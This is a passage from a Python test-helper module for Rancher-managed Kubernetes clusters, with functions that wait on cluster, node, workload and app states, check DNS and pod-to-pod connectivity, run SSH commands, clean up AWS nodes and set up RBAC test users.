clusterId=cluster.id).data[0]
sys_p_client = get_project_client_for_token(sys_project, userToken)
for wl in sys_p_client.list_workload().data:
"""to help run KDM job faster (when there are many clusters),
timeout=300 is set"""
wait_for_wl_to_active(sys_p_client, wl, timeout=300)
# Create Daemon set workload and have an Ingress with Workload
# rule pointing to this daemonSet
project, ns = create_project_and_ns(userToken, cluster)
p_client = get_project_client_for_token(project, userToken)
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id,
daemonSetConfig={})
validate_workload(p_client, workload, "daemonSet", ns.name,
len(get_schedulable_nodes(cluster, client)))
if not skipIngresscheck:
pods = p_client.list_pod(workloadId=workload["id"]).data
scale = len(pods)
# test service discovery
validate_service_discovery(workload, scale, p_client, ns, pods)
host = "test" + str(random_int(10000, 99999)) + ".com"
path = "/name.html"
rule = {"host": host,
"paths":
[{"workloadIds": [workload.id],
"targetPort": TEST_IMAGE_PORT}]}
ingress = p_client.create_ingress(name=name,
namespaceId=ns.id,
rules=[rule])
wait_for_ingress_to_active(p_client, ingress)
validate_ingress(p_client, cluster, [workload], host, path)
return cluster
def check_cluster_version(cluster, version):
cluster_k8s_version = \
cluster.appliedSpec["rancherKubernetesEngineConfig"][
"kubernetesVersion"]
assert cluster_k8s_version == version, \
"cluster_k8s_version: " + cluster_k8s_version + \
" Expected: " + version
expected_k8s_version = version[:version.find("-rancher")]
k8s_version = execute_kubectl_cmd("version")
kubectl_k8s_version = k8s_version["serverVersion"]["gitVersion"]
assert kubectl_k8s_version == expected_k8s_version, \
"kubectl version: " + kubectl_k8s_version + \
" Expected: " + expected_k8s_version
def check_cluster_state(etcd_count):
css_resp = execute_kubectl_cmd("get cs")
css = css_resp["items"]
components = ["scheduler", "controller-manager"]
for i in range(0, etcd_count):
components.append("etcd-" + str(i))
print("components to check - " + str(components))
for cs in css:
component_name = cs["metadata"]["name"]
assert component_name in components
components.remove(component_name)
assert cs["conditions"][0]["status"] == "True"
assert cs["conditions"][0]["type"] == "Healthy"
assert len(components) == 0
def validate_dns_record(pod, record, expected, port=TEST_IMAGE_PORT):
# requires pod with `dig` available - TEST_IMAGE
host = '{0}.{1}.svc.cluster.local'.format(
record["name"], record["namespaceId"])
validate_dns_entry(pod, host, expected, port=port)
def retry_dig(host, pod, expected, retry_count=3):
for i in range(0, retry_count):
dig_cmd = 'dig {0} +short'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
decode_dig = dig_output.decode('utf-8')
split_dig = decode_dig.splitlines()
dig_length = len(split_dig)
expected_length = len(expected)
if dig_length >= expected_length:
return dig_output
elif dig_length < expected_length:
time.sleep(3)
pytest.fail(f"failed to get the expected number of dns hosts from dig")
def validate_dns_entry(pod, host, expected, port=TEST_IMAGE_PORT, retry_count=3):
if is_windows():
validate_dns_entry_windows(pod, host, expected)
return
# requires pod with `dig` available - TEST_IMAGE
if HARDENED_CLUSTER:
cmd = 'curl -vs {}:{} 2>&1'.format(host, port)
else:
cmd = 'ping -c 1 -W 1 {0}'.format(host)
cmd_output = kubectl_pod_exec(pod, cmd)
if str(pod.name) not in str(cmd_output):
for i in range(0, retry_count):
cmd_output = kubectl_pod_exec(pod, cmd)
if str(pod.name) in str(cmd_output):
break
else:
time.sleep(5)
connectivity_validation_pass = False
for expected_value in expected:
if expected_value in str(cmd_output):
connectivity_validation_pass = True
break
assert connectivity_validation_pass is True
if HARDENED_CLUSTER:
assert " 200 OK" in str(cmd_output)
else:
assert " 0% packet loss" in str(cmd_output)
dig_output = retry_dig(host, pod, expected)
for expected_value in expected:
assert expected_value in str(dig_output), \
"Error the dig command returned: {0}".format(dig_output)
def validate_dns_entry_windows(pod, host, expected):
def ping_check():
ping_cmd = 'ping -w 1 -n 1 {0}'.format(host)
ping_output = kubectl_pod_exec(pod, ping_cmd)
ping_validation_pass = False
for expected_value in expected:
if expected_value in str(ping_output):
ping_validation_pass = True
break
return ping_validation_pass and (" (0% loss)" in str(ping_output))
wait_for(callback=ping_check,
timeout_message="Failed to ping {0}".format(host))
def dig_check():
dig_cmd = 'powershell -NoLogo -NonInteractive -Command ' \
'"& {{ (Resolve-DnsName {0}).IPAddress }}"'.format(host)
dig_output = kubectl_pod_exec(pod, dig_cmd)
dig_validation_pass = True
for expected_value in expected:
if expected_value not in str(dig_output):
dig_validation_pass = False
break
return dig_validation_pass
wait_for(callback=dig_check,
timeout_message="Failed to resolve {0}".format(host))
def validate_dns_record_deleted(client, dns_record, timeout=DEFAULT_TIMEOUT):
"""
Checks whether dns_record got deleted successfully.
Validates if dns_record is null in for current object client.
@param client: Object client use to create dns_record
@param dns_record: record object subjected to be deleted
@param timeout: Max time to keep checking whether record is deleted or not
"""
time.sleep(2)
start = time.time()
records = client.list_dns_record(name=dns_record.name, ).data
while len(records) != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for record {} to be deleted"
"".format(dns_record.name))
time.sleep(.5)
records = client.list_dns_record(name=dns_record.name, ).data
def wait_for_nodes_to_become_active(client, cluster, exception_list=[],
retry_count=0):
nodes = client.list_node(clusterId=cluster.id).data
node_auto_deleted = False
for node in nodes:
if node.requestedHostname not in exception_list:
node = wait_for_node_status(client, node, "active")
if node is None:
print("Need to re-evalauate new node list")
node_auto_deleted = True
retry_count += 1
print("Retry Count:" + str(retry_count))
if node_auto_deleted and retry_count < 5:
wait_for_nodes_to_become_active(client, cluster, exception_list,
retry_count)
def wait_for_node_status(client, node, state):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
# Handle the case of nodes getting auto deleted when they are part of
# nodepools
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
while node_status != state:
if time.time() - start > MACHINE_TIMEOUT:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
if node_count == 1:
node_status = nodes[0].state
else:
print("Node does not exist anymore -" + uuid)
return None
return node
def wait_for_node_to_be_deleted(client, node, timeout=300):
uuid = node.uuid
start = time.time()
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
while node_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for node delete")
time.sleep(.5)
nodes = client.list_node(uuid=uuid).data
node_count = len(nodes)
def wait_for_cluster_node_count(client, cluster, expected_node_count,
timeout=300):
start = time.time()
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
while node_count != expected_node_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nodes = client.list_node(clusterId=cluster.id).data
node_count = len(nodes)
def get_custom_host_registration_cmd(client, cluster, roles, node):
allowed_roles = ["etcd", "worker", "controlplane"]
cluster_tokens = client.list_cluster_registration_token(
clusterId=cluster.id).data
if len(cluster_tokens) > 0:
cluster_token = cluster_tokens[0]
else:
cluster_token = create_custom_host_registration_token(client, cluster)
additional_options = " --address " + node.public_ip_address + \
" --internal-address " + node.private_ip_address
if 'Administrator' == node.ssh_user:
cmd = cluster_token.windowsNodeCommand
cmd = cmd.replace('| iex', '--worker' + additional_options + ' | iex ')
else:
cmd = cluster_token.nodeCommand
for role in roles:
assert role in allowed_roles
cmd += " --" + role
cmd += additional_options
return cmd
def create_custom_host_registration_token(client, cluster):
# Allow sometime for the "cluster_owner" CRTB to take effect
time.sleep(5)
cluster_token = client.create_cluster_registration_token(
clusterId=cluster.id)
cluster_token = client.wait_success(cluster_token)
assert cluster_token.state == 'active'
return cluster_token
def get_cluster_by_name(client, name):
clusters = client.list_cluster(name=name).data
assert len(clusters) == 1, "Cluster " + name + " does not exist"
return clusters[0]
def get_cluster_type(client, cluster):
cluster_configs = [
"amazonElasticContainerServiceConfig",
"azureKubernetesServiceConfig",
"googleKubernetesEngineConfig",
"rancherKubernetesEngineConfig"
]
if "rancherKubernetesEngineConfig" in cluster:
nodes = client.list_node(clusterId=cluster.id).data
if len(nodes) > 0:
if nodes[0].nodeTemplateId is None:
return "Custom"
for cluster_config in cluster_configs:
if cluster_config in cluster:
return cluster_config
return "Imported"
def delete_cluster(client, cluster):
nodes = client.list_node(clusterId=cluster.id).data
# Delete nodes(in cluster) from AWS for Imported and Custom Cluster
if len(nodes) > 0:
cluster_type = get_cluster_type(client, cluster)
print(cluster_type)
if get_cluster_type(client, cluster) in ["Imported", "Custom"]:
filters = [
{'Name': 'tag:Name',
'Values': ['testcustom*', 'teststress*', 'testsa*']}]
ip_filter = {}
ip_list = []
ip_filter['Name'] = \
'network-interface.addresses.association.public-ip'
ip_filter['Values'] = ip_list
filters.append(ip_filter)
for node in nodes:
host_ip = resolve_node_ip(node)
ip_list.append(host_ip)
assert len(ip_filter) > 0
print(ip_filter)
aws_nodes = AmazonWebServices().get_nodes(filters)
if aws_nodes is None:
# search instances by IPs in case names do not follow patterns
aws_nodes = AmazonWebServices().get_nodes(filters=[ip_filter])
if aws_nodes is None:
print("no instance is found in AWS")
else:
for node in aws_nodes:
print(node.public_ip_address)
AmazonWebServices().delete_nodes(aws_nodes)
# Delete Cluster
client.delete(cluster)
def check_connectivity_between_workloads(p_client1, workload1, p_client2,
workload2, allow_connectivity=True):
wl1_pods = p_client1.list_pod(workloadId=workload1.id).data
wl2_pods = p_client2.list_pod(workloadId=workload2.id).data
for pod in wl1_pods:
for o_pod in wl2_pods:
check_connectivity_between_pods(pod, o_pod, allow_connectivity)
def check_connectivity_between_workload_pods(p_client, workload):
pods = p_client.list_pod(workloadId=workload.id).data
for pod in pods:
for o_pod in pods:
check_connectivity_between_pods(pod, o_pod)
def check_connectivity_between_pods(pod1, pod2, allow_connectivity=True):
pod_ip = pod2.status.podIp
if is_windows():
cmd = 'ping -w 1 -n 1 {0}'.format(pod_ip)
elif HARDENED_CLUSTER:
cmd = 'curl -I {}:{}'.format(pod_ip, TEST_IMAGE_PORT)
else:
cmd = "ping -c 1 -W 1 " + pod_ip
response = kubectl_pod_exec(pod1, cmd)
if not HARDENED_CLUSTER:
assert pod_ip in str(response)
if allow_connectivity:
if is_windows():
assert " (0% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" in str(response)
else:
assert " 0% packet loss" in str(response)
else:
if is_windows():
assert " (100% loss)" in str(response)
elif HARDENED_CLUSTER:
assert " 200 OK" not in str(response)
else:
assert " 100% packet loss" in str(response)
def kubectl_pod_exec(pod, cmd):
command = "exec " + pod.name + " -n " + pod.namespaceId + " -- " + cmd
return execute_kubectl_cmd(command, json_out=False, stderr=True)
def exec_shell_command(ip, port, cmd, password, user="root", sshKey=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
if sshKey:
ssh.connect(ip, username=user, key_filename=sshKey, port=port)
else:
ssh.connect(ip, username=user, password=password, port=port)
stdin, stdout, stderr = ssh.exec_command(cmd)
response = stdout.readlines()
return response
def wait_for_ns_to_become_active(client, ns, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(10)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
while ns.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
nss = client.list_namespace(uuid=ns.uuid).data
assert len(nss) == 1
ns = nss[0]
return ns
def wait_for_pod_images(p_client, workload, ns_name, expectedimage, numofpods,
timeout=DEFAULT_TIMEOUT):
start = time.time()
for key, value in workload.workloadLabels.items():
label = key + "=" + value
get_pods = "get pods -l" + label + " -n " + ns_name
pods = execute_kubectl_cmd(get_pods)
for x in range(0, numofpods - 1):
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
while podimage != expectedimage:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for correct pod images")
time.sleep(.5)
pods = execute_kubectl_cmd(get_pods)
pod = pods["items"][x]
podimage = pod["spec"]["containers"][0]["image"]
def wait_for_pods_in_workload(p_client, workload, pod_count,
timeout=DEFAULT_TIMEOUT):
start = time.time()
pods = p_client.list_pod(workloadId=workload.id).data
while len(pods) != pod_count:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for pods in workload {}. Expected {}. "
"Got {}".format(workload.name, pod_count, len(pods)))
time.sleep(.5)
pods = p_client.list_pod(workloadId=workload.id).data
return pods
def get_user_client_and_cluster(client=None):
if not client:
client = get_user_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def get_global_admin_client_and_cluster():
client = get_admin_client()
if CLUSTER_NAME == "":
clusters = client.list_cluster().data
else:
clusters = client.list_cluster(name=CLUSTER_NAME).data
assert len(clusters) > 0
cluster = clusters[0]
return client, cluster
def validate_cluster_state(client, cluster,
check_intermediate_state=True,
intermediate_state="provisioning",
nodes_not_in_active_state=[],
timeout=MACHINE_TIMEOUT):
start_time = time.time()
if check_intermediate_state:
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == intermediate_state,
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == intermediate_state
cluster = wait_for_condition(
client, cluster,
lambda x: x.state == "active",
lambda x: 'State is: ' + x.state,
timeout=timeout)
assert cluster.state == "active"
wait_for_nodes_to_become_active(client, cluster,
exception_list=nodes_not_in_active_state)
timeout = 60
start = time.time()
while "version" not in cluster.keys():
time.sleep(1)
cluster = client.reload(cluster)
delta = time.time() - start
if delta > timeout:
msg = "Timeout waiting for K8s version to be synced"
raise Exception(msg)
end_time = time.time()
diff = time.strftime("%H:%M:%S", time.gmtime(end_time - start_time))
print("The total time for provisioning/updating the cluster {} : {}".
format(cluster.name, diff))
return cluster
def wait_until_available(client, obj, timeout=DEFAULT_TIMEOUT):
start = time.time()
sleep = 0.01
while True:
time.sleep(sleep)
sleep *= 2
if sleep > 2:
sleep = 2
try:
obj = client.reload(obj)
except ApiError as e:
if e.error.status != 403:
raise e
else:
return obj
delta = time.time() - start
if delta > timeout:
msg = 'Timeout waiting for [{}:{}] for condition after {}' \
' seconds'.format(obj.type, obj.id, delta)
raise Exception(msg)
def delete_node(aws_nodes):
for node in aws_nodes:
AmazonWebServices().delete_node(node)
def cluster_cleanup(client, cluster, aws_nodes=None):
if RANCHER_CLEANUP_CLUSTER:
client.delete(cluster)
if aws_nodes is not None:
delete_node(aws_nodes)
else:
env_details = "env.CATTLE_TEST_URL='" + CATTLE_TEST_URL + "'\n"
env_details += "env.ADMIN_TOKEN='" + ADMIN_TOKEN + "'\n"
env_details += "env.USER_TOKEN='" + USER_TOKEN + "'\n"
env_details += "env.CLUSTER_NAME='" + cluster.name + "'\n"
create_config_file(env_details)
def create_config_file(env_details):
file = open(env_file, "w")
file.write(env_details)
file.close()
def validate_hostPort(p_client, workload, source_port, cluster):
get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
pods = p_client.list_pod(workloadId=workload.id).data
nodes = get_schedulable_nodes(cluster)
for node in nodes:
target_name_list = []
for pod in pods:
print(pod.nodeId + " check " + node.id)
if pod.nodeId == node.id:
target_name_list.append(pod.name)
break
if len(target_name_list) > 0:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_lb(p_client, workload, source_port):
url = get_endpoint_url_for_workload(p_client, workload)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
target_name_list = get_target_names(p_client, [workload])
wait_until_lb_is_active(url)
validate_http_response(url + "/name.html", target_name_list)
def validate_nodePort(p_client, workload, cluster, source_port):
get_endpoint_url_for_workload(p_client, workload, 600)
wl = p_client.list_workload(uuid=workload.uuid).data[0]
source_port_wk = wl.publicEndpoints[0]["port"]
assert source_port == source_port_wk, "Source ports do not match"
nodes = get_schedulable_nodes(cluster)
pods = p_client.list_pod(workloadId=wl.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod.name)
print("target name list:" + str(target_name_list))
for node in nodes:
host_ip = resolve_node_ip(node)
curl_cmd = " http://" + host_ip + ":" + \
str(source_port_wk) + "/name.html"
validate_http_response(curl_cmd, target_name_list)
def validate_clusterIp(p_client, workload, cluster_ip, test_pods, source_port):
pods = p_client.list_pod(workloadId=workload.id).data
target_name_list = []
for pod in pods:
target_name_list.append(pod["name"])
curl_cmd = "http://" + cluster_ip + ":" + \
str(source_port) + "/name.html"
for pod in test_pods:
validate_http_response(curl_cmd, target_name_list, pod)
def wait_for_pv_to_be_available(c_client, pv_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
while pv.state != "available":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to available")
time.sleep(.5)
list = c_client.list_persistent_volume(uuid=pv_object.uuid).data
assert len(list) == 1
pv = list[0]
return pv
def wait_for_pvc_to_be_bound(p_client, pvc_object, timeout=DEFAULT_TIMEOUT):
start = time.time()
time.sleep(2)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
while pvc.state != "bound":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to bound")
time.sleep(.5)
list = p_client.list_persistent_volume_claim(uuid=pvc_object.uuid).data
assert len(list) == 1
pvc = list[0]
return pvc
def create_wl_with_nfs(p_client, ns_id, pvc_name, wl_name,
mount_path, sub_path, is_daemonSet=False):
volumes = [{"type": "volume",
"name": "vol1",
"persistentVolumeClaim": {
"readOnly": "false",
"type": "persistentVolumeClaimVolumeSource",
"persistentVolumeClaimId": pvc_name
}}]
volumeMounts = [{"readOnly": "False",
"type": "volumeMount",
"mountPath": mount_path,
"subPath": sub_path,
"name": "vol1"
}]
con = [{"name": "test1",
"image": TEST_IMAGE,
"volumeMounts": volumeMounts
}]
if is_daemonSet:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes,
daemonSetConfig={})
else:
workload = p_client.create_workload(name=wl_name,
containers=con,
namespaceId=ns_id,
volumes=volumes)
return workload
def write_content_to_file(pod, content, filename):
cmd_write = "/bin/bash -c 'echo {1} > {0}'".format(filename, content)
if is_windows():
cmd_write = \
'powershell -NoLogo -NonInteractive -Command ' \
'"& { echo {1} > {0} }"'.format(filename, content)
output = kubectl_pod_exec(pod, cmd_write)
assert output.strip().decode('utf-8') == ""
def validate_file_content(pod, content, filename):
cmd_get_content = "/bin/bash -c 'cat {0}' ".format(filename)
if is_windows():
cmd_get_content = 'powershell -NoLogo -NonInteractive -Command ' \
'"& { cat {0} }"'.format(filename)
output = kubectl_pod_exec(pod, cmd_get_content)
assert output.strip().decode('utf-8') == content
def wait_for_mcapp_to_active(client, multiClusterApp,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
time.sleep(5)
# When the app is deployed it goes into Active state for a short
# period of time and then into installing/deploying.
mcapps = client.list_multiClusterApp(uuid=multiClusterApp.uuid,
name=multiClusterApp.name).data
start = time.time()
assert len(mcapps) == 1, "Cannot find multi cluster app"
mapp = mcapps[0]
while mapp.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
multiclusterapps = client.list_multiClusterApp(
uuid=multiClusterApp.uuid, name=multiClusterApp.name).data
assert len(multiclusterapps) == 1
mapp = multiclusterapps[0]
return mapp
def wait_for_app_to_active(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
"""
First wait for app to come in deployment state, then wait for it get
in active state. This is to avoid wrongly conclude that app is active
as app goes to state installing > active > deploying > active
@param client: Project client
@param app_id: App id of deployed app.
@param timeout: Max time allowed to wait for app to become active.
@return: app object
"""
start = time.time()
app_data = client.list_app(id=app_id).data
while len(app_data) == 0:
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for listing the app from API")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "deploying":
if time.time() - start > timeout / 3:
break
time.sleep(.2)
app_data = client.list_app(id=app_id).data
application = app_data[0]
while application.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for {0} to get to active,"
" the actual state: {1}".format(application.name,
application.state))
time.sleep(.5)
app = client.list_app(id=app_id).data
assert len(app) >= 1
application = app[0]
return application
def wait_for_app_to_remove(client, app_id,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
start = time.time()
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing" or application.state == "active":
if time.time() - start > timeout / 10:
raise AssertionError(
"Timed out waiting for app to not be installed")
time.sleep(.2)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_response_app_endpoint(p_client, appId,
timeout=DEFAULT_MULTI_CLUSTER_APP_TIMEOUT):
ingress_list = p_client.list_ingress(namespaceId=appId).data
assert len(ingress_list) == 1
ingress = ingress_list[0]
if hasattr(ingress, 'publicEndpoints'):
for public_endpoint in ingress.publicEndpoints:
url = \
public_endpoint["protocol"].lower() + "://" + \
public_endpoint["hostname"]
print(url)
start = time.time()
try:
while True:
r = requests.head(url)
print(r.status_code)
if r.status_code == 200:
return
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting response to be 200.")
time.sleep(.5)
except requests.ConnectionError:
print("failed to connect")
assert False, "failed to connect to the app"
def resolve_node_ip(node):
if hasattr(node, 'externalIpAddress'):
node_ip = node.externalIpAddress
else:
node_ip = node.ipAddress
return node_ip
def provision_nfs_server():
node = AmazonWebServices().create_node(random_test_name("nfs-server"))
node.wait_for_ssh_ready()
c_path = os.getcwd()
cmd_path = c_path + "/tests/v3_api/scripts/nfs-setup.sh"
command = open(cmd_path, 'r').read()
node.execute_command(command)
return node
def get_defaut_question_answers(client, externalId):
def get_answer(quest):
if "default" in quest.keys():
answer = quest["default"]
else:
answer = ""
# If required and no default value is available, set fake value
# only for type string . For other types error out
if "required" in quest.keys():
if quest["required"]:
if quest["type"] == "enum" and "options" in quest.keys():
answer = quest["options"][0]
elif quest["type"] == "password":
answer = "R@ncher135"
elif quest["type"] == "string":
answer = "fake"
else:
assert False, \
"Cannot set default for types {}" \
"".format(quest["type"])
return answer
def check_if_question_needed(questions_and_answers, ques):
add_question = False
match_string = ques["showIf"]
match_q_as = match_string.split("&&")
for q_a in match_q_as:
items = q_a.split("=")
if len(items) == 1:
items.append("")
if items[0] in questions_and_answers.keys():
if questions_and_answers[items[0]] == items[1]:
add_question = True
else:
add_question = False
break
return add_question
questions_and_answers = {}
print("external id = {}".format(externalId))
template_revs = client.list_template_version(externalId=externalId).data
assert len(template_revs) == 1
template_rev = template_revs[0]
questions = template_rev.questions
for ques in questions:
add_question = True
if "showIf" in ques.keys():
add_question = \
check_if_question_needed(questions_and_answers, ques)
if add_question:
question = ques["variable"]
answer = get_answer(ques)
questions_and_answers[question] = get_answer(ques)
if "showSubquestionIf" in ques.keys():
if ques["showSubquestionIf"] == answer:
sub_questions = ques["subquestions"]
for sub_question in sub_questions:
question = sub_question["variable"]
questions_and_answers[question] = \
get_answer(sub_question)
print("questions_and_answers = {}".format(questions_and_answers))
return questions_and_answers
def validate_app_deletion(client, app_id,
timeout=DEFAULT_APP_DELETION_TIMEOUT):
app_data = client.list_app(id=app_id).data
start = time.time()
if len(app_data) == 0:
return
application = app_data[0]
while application.state == "removing":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for app to delete")
time.sleep(.5)
app_data = client.list_app(id=app_id).data
if len(app_data) == 0:
break
application = app_data[0]
def validate_catalog_app(proj_client, app, external_id, answer=None):
"""
This method validates all the workloads deployed are in active state,
have correct version and validates the answers.
@param proj_client: Project client object of a existing project.
@param app: Deployed app object.
@param external_id: URl of app API.
@param answer: answer, app seek while deploying, body of the post call.
@return: Deployed app object.
"""
if answer is None:
answers = get_defaut_question_answers(get_user_client(), external_id)
else:
answers = answer
# validate app is active
app = wait_for_app_to_active(proj_client, app.id)
assert app.externalId == external_id, \
"the version of the app is not correct"
# check if associated workloads are active
ns = app.targetNamespace
parameters = external_id.split('&')
assert len(parameters) > 1, \
"Incorrect list of parameters from catalog external ID"
chart_prefix = parameters[len(parameters) - 2].split("=")[1]
chart_suffix = parameters[len(parameters) - 1].split("=")[1]
chart = chart_prefix + "-" + chart_suffix
app_name = parameters[len(parameters) - 2].split("=")[1]
workloads = proj_client.list_workload(namespaceId=ns).data
# For longhorn app, only active state of workloads is verified as longhorn
# workloads do not have the field workloadLabels
# For all other apps active state of workloads & chart version are verified
if "longhorn" in app.externalId:
print("validating the Longhorn app, it may take longer than others")
for wl in workloads:
wait_for_wl_to_active(proj_client, wl)
else:
for wl in workloads:
print("Workload {} , state - {}".format(wl.id, wl.state))
assert wl.state == "active"
chart_deployed = get_chart_info(wl.workloadLabels)
print("Chart detail of app - {}".format(chart_deployed))
# '-' check is to make sure chart has both app name and version.
if app_name in chart_deployed and '-' in chart_deployed:
assert chart_deployed == chart, "the chart version is wrong"
# Validate_app_answers
assert len(answers.items() - app["answers"].items()) == 0, \
"Answers are not same as the original catalog answers"
return app
def get_chart_info(workloadlabels):
"""
This method finds either 'chart' tag or
'helm.sh/chart' tag from workload API
@param workloadlabels: workloadslabel object
@return: chart value of workload e.g. 'app_name-version'
"""
if "chart" in workloadlabels.keys():
return workloadlabels.chart
elif "helm.sh/chart" in workloadlabels.keys():
return workloadlabels["helm.sh/chart"]
else:
return ''
def create_user(client, cattle_auth_url=CATTLE_AUTH_URL):
user_name = random_name()
user = client.create_user(username=user_name,
password=USER_PASSWORD)
client.create_global_role_binding(globalRoleId="user",
subjectKind="User",
userId=user.id)
user_token = get_user_token(user.username, USER_PASSWORD, cattle_auth_url)
return user, user_token
def get_user_token(username, password, cattle_auth_url=CATTLE_AUTH_URL):
r = requests.post(cattle_auth_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
print(r.json())
return r.json()["token"]
def rbac_get_user_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["user"]
return None
def rbac_get_user_token_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["token"]
return None
def rbac_get_kubeconfig_by_role(role):
if role in rbac_data["users"].keys():
return rbac_data["users"][role]["kubeconfig"]
return None
def rbac_get_project():
return rbac_data["project"]
def rbac_get_namespace():
return rbac_data["namespace"]
def rbac_get_workload():
return rbac_data["workload"]
def rbac_get_unshared_project():
return rbac_data["p_unshared"]
def rbac_get_unshared_ns():
return rbac_data["ns_unshared"]
def rbac_get_unshared_workload():
return rbac_data["wl_unshared"]
def rbac_prepare():
"""this function creates one project, one namespace,
and four users with different roles"""
admin_client, cluster = get_global_admin_client_and_cluster()
create_kubeconfig(cluster)
# create a new project in the cluster
project, ns = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-test-rbac"))
con = [{"name": "test1",
"image": TEST_IMAGE}]
name = random_test_name("default")
p_client = get_project_client_for_token(project, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns.id)
validate_workload(p_client, workload, "deployment", ns.name)
rbac_data["workload"] = workload
rbac_data["project"] = project
rbac_data["namespace"] = ns
# create new users
for key in rbac_data["users"]:
user1, token1 = create_user(admin_client)
rbac_data["users"][key]["user"] = user1
rbac_data["users"][key]["token"] = token1
# assign different role to each user
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_OWNER]["user"],
cluster,
CLUSTER_OWNER)
assign_members_to_cluster(admin_client,
rbac_data["users"][CLUSTER_MEMBER]["user"],
cluster,
CLUSTER_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_MEMBER]["user"],
project,
PROJECT_MEMBER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_OWNER]["user"],
project,
PROJECT_OWNER)
assign_members_to_project(admin_client,
rbac_data["users"][PROJECT_READ_ONLY]["user"],
project,
PROJECT_READ_ONLY)
# create kubeconfig files for each user
for key in rbac_data["users"]:
user_client = get_client_for_token(rbac_data["users"][key]["token"])
_, user_cluster = get_user_client_and_cluster(user_client)
rbac_data["users"][key]["kubeconfig"] = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
key + "_kubeconfig")
create_kubeconfig(user_cluster, rbac_data["users"][key]["kubeconfig"])
# create another project that none of the above users are assigned to
p2, ns2 = create_project_and_ns(ADMIN_TOKEN,
cluster,
random_test_name("p-unshared"))
name = random_test_name("default")
p_client = get_project_client_for_token(p2, ADMIN_TOKEN)
workload = p_client.create_workload(name=name,
containers=con,
namespaceId=ns2.id)
validate_workload(p_client, workload, "deployment", ns2.name)
rbac_data["p_unshared"] = p2
rbac_data["ns_unshared"] = ns2
rbac_data["wl_unshared"] = workload
def rbac_cleanup():
""" remove the project, namespace and users created for the RBAC tests"""
try:
client = get_admin_client()
except Exception:
print("Not able to get admin client. Not performing RBAC cleanup")
return
for _, value in rbac_data["users"].items():
try:
client.delete(value["user"])
except Exception:
pass
client.delete(rbac_data["project"])
client.delete(rbac_data["wl_unshared"])
client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
def _find_condition(resource):
if not hasattr(resource, "conditions"):
return False
if resource.conditions is None:
return False
for condition in resource.conditions:
if condition.type == condition_type and condition.status == status:
return True
return False
return _find_condition
def create_catalog_external_id(catalog_name, template, version,
project_cluster_id=None, catalog_type=None):
if catalog_type is None:
